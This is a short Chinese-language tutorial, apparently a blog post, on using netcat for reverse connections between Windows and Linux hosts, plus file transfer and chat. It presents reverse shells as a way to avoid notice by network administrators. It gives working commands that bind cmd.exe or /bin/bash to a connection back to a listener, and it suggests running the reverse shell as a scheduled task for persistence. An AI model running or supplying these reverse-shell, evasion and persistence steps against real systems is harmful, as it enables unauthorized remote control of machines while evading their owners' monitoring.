一:前言
一般來說,網絡管理者對用戶端發起的連接配接伺服器請求比較在意,隻要是本機開放的1024端口以下都會進行仔細檢查。
對伺服器發起的請求就沒那麼在意了,畢竟端口那麼多,不可能對每個端口都了解
利用反向連接配接能減少被網絡管理者發現的機率
注:windows版的netcat可以連接配接Linux版的netcat,Linux版的netcat也可以連接配接windows版的netcat,兩者在參數和程式功能上稍有不同,要注意區分
二:windows下的反向連接配接
netcat版本帶e的才支援反向連接配接
![](https://img.laitimes.com/img/9ZDMuAjOiMmIsIjOiQnIsICM38FdsYkRGZkRG9lcvx2bjxiNx8VZ6l2csITUq5UeFRVT10keYhnRzwEMW1mY1RzRapnTtxkb5ckYplTeMZTTINGMShUYfRHelRHLwEzX39GZhh2css2RkBnVHFmb1clWvB3MaVnRtp1XlBXe0xyayFWbyVGdhd3LcV2Zh1Wa9M3clN2byBXLzN3btg3Pn5GcuITN3EzNwEjMzIzMwkTMwIzLc52YucWbp5GZzNmLn9Gbi1yZtl2Lc9CX6MHc0RHaiojIsJye.png)
用戶端 win7 10.0.0.5
伺服器 win2003 10.0.0.4
1.首先在用戶端監聽一個小于1024 沒有占用的端口
nc -l -v -n -p 22
2.把netcat上傳到伺服器執行指令
nc -e cmd.exe 10.0.0.5 22
用戶端的終端如下
3. 執行指令檢視
用戶端cmd
伺服器的cmd
三:Linux下的反向連接配接
幾乎和windows下的一種,隻需将windows下的cmd改為/bin/bash
Linux下有兩個netcat,一個是gnu netcat 一個是Netcat
可以采用Python進行反向連接配接
四:反向連接配接技巧
可以将反向連接配接作為一個定時任務來執行,每天或者每周的某個時候執行,平常在某個角落
五:檔案上傳
nc -l -p 1433 > virus.exe
監聽1433端口,等待連接配接,任何輸入的資訊都被存儲到virus.exe
nc 10.0.0.3 1433 < 1.txt
把目前主機上的1.txt 上傳到10.0.0.3主機的virus檔案
缺點:不會顯示是否上傳成功,隻能斷開連接配接,檢視内容
六:聊天
nc -l -p 1433
監聽1433端口,等待連接配接
nc 10.0.0.3 1433
把目前主機連接配接到10.0.0.3計算機上的1433端口
注:在任一終端輸入内容後回車,就會在兩台電腦的終端上顯示出來